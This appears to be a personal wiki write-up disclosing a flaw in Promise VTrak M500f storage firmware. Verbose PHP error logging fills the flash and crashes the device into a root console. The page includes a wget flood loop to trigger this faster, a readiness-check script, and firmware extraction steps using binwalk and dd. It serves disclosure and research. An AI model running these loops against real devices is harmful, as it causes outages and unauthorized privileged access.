Promise VTrak M500f: Difference between revisions
m (1 revision imported) |
m (74 revisions imported) |
(No difference)
|
Latest revision as of 20:10, 26 August 2016
Exploit
I'm using a Promise VTrak M500f storage at work, and every couple of weeks it crashes. Updating to the latest firmware didn't help much.
It always starts with the device's webserver being unresponsive, and not much later the whole device just breaking down.
Usually, when i notice that the device starts to act up again, i just reboot it and it's fine for the next couple of weeks.
To do this, i log in on the serial console and run:
administrator@cli> shutdown -a restart
So the last time this happened, i noticed something is different with the CLI over serial console... it was... way more interesting!
Oh, exploitable!
Here's one of the problem sources: in line 23 and 24 of /islavista/sw/php/promise/language.php, which is included in the code that's executed when you access the device's WebPAM PROe webinterface, PHP is told to get the language of the user's browser from a header that the browser sends on each request.
No problem there, your browser provides this header, so you probably won't ever see any error from this code.
But if you're using a monitoring tool like Nagios, to check if the webinterface is still alive, your Nagios check doesn't send that header and PHP will throw an error of the level E_NOTICE.
$ php -a Interactive mode enabled <?php preg_match('/^([a-z\-]+)/i', $_SERVER['HTTP_ACCEPT_LANGUAGE'], $matches); $lang=$matches[1]; switch(substr($lang,0,2)) { case 'en': $language='en_US'; break; // [...] default: $language='en_US'; break; } ?> PHP Notice: Undefined index: HTTP_ACCEPT_LANGUAGE in - on line 2 PHP Notice: Undefined offset: 1 in - on line 3
Of course, being the good developer that you are, you hide those errors, should they ever arise at all, from the user - and only write them to a logfile somewhere on your device's internal flash.
[08-Jul-2011 19:52:24] PHP Notice: Undefined index: HTTP_ACCEPT_LANGUAGE in /islavista/sw/php/promise/language.php on line 23 [08-Jul-2011 19:52:24] PHP Notice: Undefined offset: 1 in /islavista/sw/php/promise/language.php on line 24 [08-Jul-2011 19:52:26] PHP Notice: Undefined index: HTTP_HOST in /islavista/sw/php/promise/index.php on line 182
Being a bit unsure yourself of how good of a developer you really are, you tell PHP in its config file /islavista/conf/sw/php.ini to not only log real errors of the levels E_WARNING or E_ERROR, or like the healthy default recommends, "E_ALL & ~E_NOTICE" (everything except E_NOTICE)... no, you want them all, so you can write impeccable code!
Have you ever wondered why it's called "default" setting? The De-Fault setting? Also known as the "Please don't break anything!" setting? You'll find out soon.
So, your Nagios checks the webserver every 5 minutes, every hour of the day, every day of the week, etc., and every time there are a couple of lines appended to the logfile, because you want to be in control an see each and any issue in you code.
Now what would you think will happen if that logfile gets so big that there is no space left on that flash?
I can tell you what will happen:
islavista> _
When i told Promise about the issue, one of their support engineers had only this to say:
"I just can repeat [to] you one more time, you should not even know the word 'islavista' related to this device."
Okay, that was a lie, it wasn't the only thing he said. He added:
"You need a new controller."
O RLY? I don't think that replacing my hardware will fix an issue in your firmware.
(Speaking of which, i'm still unsure if i should publish the whole conversation via their ticketing system, that will be pretty embarassing for them... they tried to convince me that my hardware is faulty and needs to be replaced. Yeah, right.)
Privilege Escalation
The 3 lines per request equal 354 Bytes of text, and my storage crashed when the logfile was roughly 3.5 MB in size, so in theory ~10.000 requests are all that's needed for this exploit to work its magic.
Nagios checks every 5 minutes, that's 288 requests per day, which means that after ~35 days the log should have filled all available space.
Can we speed this up? Yes, we can. A wget request to the webinterface takes me an average of 6 seconds, so with the following simple script i can get ~14400 requests per day, which means it takes ~17 hours fill all available space.
$ while [ true ]; do wget -O /dev/null "http://192.168.0.2"; done
Check the webinterface from time to time, when you see an PHP error that it couldn't write it's session because /tmp is full, you're golden! Fire up you serial console and enjoy.
You can automate this, too:
$ while [ true ]; do if `lynx --dump "http://192.168.0.2/" | grep -q "tmp"`; then echo "EOF" | mail -s 'Exploit ready!' you@example.com; break; fi; done
Remote Privilege Escalation, too?
Still unconfirmed, but in theory this should also work over Telnet instead of the serial console, provided that Telnet is enabled on the device.
Firmware
Getting Started
Download the most recent firmware, at the time of this writing it was v2.39, and also make sure you have binwalk installed, an incredibly helpful tool when analyzing firmware files:
- Download Page: http://firstweb.promise.com/support/download/download2_eng.asp?productID=153&category=all&os=100
- Firmware: http://firstweb.promise.com/upload/Support/Firmware/Mx00_series_v2.39.0000.00_with_notes.zip
- binwalk: http://code.google.com/p/binwalk/
Analyzing the Firmware file
Use binwalk to look for the addresses of files within the firmware file:
$ binwalk -v iv2p_all_20110303_16mb.img
This gives you a nice table with the decimal offset of each file in the firmware, and also the most likely format of this file:
Scan Time: Aug 03, 2011 @ 20:13:21 Magic File: /etc/binwalk/magic.binwalk Signatures: 67 Target File: iv2p_all_20110303_16mb.img MD5 Checksum: b8dad677c907a53ca9b222f2103c13b3 DECIMAL HEX DESCRIPTION ------------------------------------------------------------------------------------------------------- 18204 0x471C gzip compressed data, from Unix, last modified: Thu Apr 20 05:12:30 2006, max compression 871968 0xD4E20 Linux Compressed ROM filesystem data, little endian size 2584576 version #2 sorted_dirs, CRC 0xeeb623f0, edition 0, 1217 blocks, 7 files 3456544 0x34BE20 Linux Compressed ROM filesystem data, little endian size 3231744 version #2 sorted_dirs, CRC 0xf1e0771a, edition 0, 2870 blocks, 946 files 3528967 0x35D907 bzip2 compressed data 6688288 0x660E20 gzip compressed data, from Unix, last modified: Thu Mar 3 03:51:40 2011, max compression 11309493 0xAC91B5 Linux Compressed ROM filesystem data, little endian size 1277952 version #2 sorted_dirs, CRC 0x477edaab, edition 0, 802 blocks, 142 files 12882033 0xC49071 LZMA compressed data, properties: 0x5D, dictionary size: 335544320 bytes, uncompressed size: 30 bytes 13215338 0xC9A66A LZMA compressed data, properties: 0x85, dictionary size: 740294656 bytes, uncompressed size: 16388 bytes 13216042 0xC9A92A LZMA compressed data, properties: 0x86, dictionary size: 745537536 bytes, uncompressed size: 16388 bytes 13216734 0xC9ABDE LZMA compressed data, properties: 0x89, dictionary size: 747110400 bytes, uncompressed size: 16388 bytes 13219257 0xC9B5B9 LZMA compressed data, properties: 0x5D, dictionary size: 335544320 bytes, uncompressed size: 30 bytes 13220658 0xC9BB32 LZMA compressed data, properties: 0x95, dictionary size: 272629760 bytes, uncompressed size: 16387 bytes 13221334 0xC9BDD6 LZMA compressed data, properties: 0x90, dictionary size: 65536 bytes, uncompressed size: 65536 bytes 13221354 0xC9BDEA LZMA compressed data, properties: 0x90, dictionary size: 65536 bytes, uncompressed size: 65536 bytes
Extracting the Firmware parts
The principle is pretty simple: use dd to read a segment from the firmware (if=), using a blocksize (bs=) of 1, starting (skip=) at the decimal offset of the file you want, with a length (count=) of "the next file's offset minus this file's offset" and write it to an ouput file (of=). It makes it a lot easier if you give the output file the extension of the filetype that binwalk tells you.
Part 1
$ dd if=iv2p_all_20110303_16mb.img bs=1 skip=18204 count=853764 of=part1.gz $ gunzip part1.gz $ file part1
part1: data
Probably the kernel and initrd?
Part 2
$ dd if=iv2p_all_20110303_16mb.img bs=1 skip=871968 count=2584576 of=part2.cramfs $ mkdir part2 $ mount -o loop parts2.cramfs part2/ $ ls -l part2/
total 4858 -rw-r--r-- 1 root root 18204 Jan 1 1970 iodrv.o -rw-r--r-- 1 root root 233655 Jan 1 1970 Marvell.o -rw-r--r-- 1 root root 470713 Jan 1 1970 qla4xxx.o -rw-r--r-- 1 root root 3193368 Jan 1 1970 raid_core.o -rw-r--r-- 1 root root 436560 Jan 1 1970 scsi.o -rw-r--r-- 1 root root 619697 Jan 1 1970 xfc.o
Kernel modules, boooring!
Part 3
$ dd if=iv2p_all_20110303_16mb.img bs=1 skip=3456544 count=72423 of=part3.cramfs $ mount -o loop part3.cramfs part3/ $ ls -lR part3/
The webinterface and some non-standard binaries, so this must be their own code.
When accessing a file you'll get an error, though. Quick check:
$ fsck.cramfs part3.cramfs
fsck.cramfs: file length too short
Damn.
Part 4
$ dd if=iv2p_all_20110303_16mb.img bs=1 skip=3528967 count=3159321 of=part4.bz2 $ bunzip2 part4.bz2
bunzip2: part4.bz2 is not a bzip2 file.
Hmm, strange.
Part 5
$ dd if=iv2p_all_20110303_16mb.img bs=1 skip=6688288 count=4621205 of=part5.gz $ gunzip part5.gz $ file part5
part5: Linux rev 1.0 ext2 filesystem data, UUID=1e4f9d2b-b406-4a38-bbf8-8f1fcf52e5c7
So it's a gzip, but that contains an ext2 partition.
$ mv part5 part5.ext2 $ mkdir part5 $ mount -o loop part5.ext2 part5/ $ ls -lR part5/
BusyBox, libraries, you name it. This must be the base Linux part.
Part 6
$ dd if=iv2p_all_20110303_16mb.img bs=1 skip=11309493 count=1572540 of=part6.cramfs $ mkdir part6/ $ mount -o loop part6.cramfs part6/ $ ls -lR part6/
fw and sw, this is probably the interesting stuff? But where's the /islavista/conf/sw/php.ini?
Fixing Part 3
Part 3 is a broken CramFS, and Part 4 is a bzip2 file that is not a bzip2 file... smells fishy. Let's say Part 3 is actually Part 3.1 and Part 4 is Part 3.2:
$ dd if=iv2p_all_20110303_16mb.img bs=1 skip=3456544 count=3231744 of=part3.cramfs $ fsck.cramfs -v part3.cramfs
cramfs endianness is little part3.cramfs: OK
Bingo!
The Missing Link
There are a lot of strings throughout the fimware that point at 4 MTD blocks which get mounted into the /islavista/conf, /islavista/fw, /islavista/sw and /oem directories.
Finding the contents of those blocks that gets written to the flash is the interesting part...
/dev/mtdblock5 /islavista/fw cramfs suid,dev,exec,auto,nouser,async,ro /dev/mtdblock6 /islavista/sw cramfs suid,dev,exec,auto,nouser,async,ro /dev/mtdblock2 /islavista/conf jffs2 defaults /dev/mtdblock7 /oem cramfs suid,dev,exec,auto,nouser,async,ro
The directory /islavista/flash seems to be the upload destination for firmware updates via the webinterface. The filesystem in Part 6 gets mounted to /oem.
So where do the juicy bits come from? Let's binwalk part1:
$binwalk -av -x MIPSE part1
We're still looking for 2 CramFS and 1 JFFS2...
Todo
- Find the page that will throw the most errors, to speed up filling the flash.
- Privilege Escalation is already nice, how about Remote Privilege Escalation? Confirm that this also works when using Telnet, not only serial console!
- Where's that php.ini hidden in the firmware? Can't be found in any of the firmware parts, yet - maybe generated at runtime? Hmm, hmm, hmm.
- Analyze the firmware of different models/series. Code recycling FTW!
Thanks
- Mathis Schmieder for the fsck.cramfs tip, i was a bit lost when i discovered the errors in Part 3
- Joris from Promise Technology, he was the one that eventually understood what i was trying to tell them all the time
EOF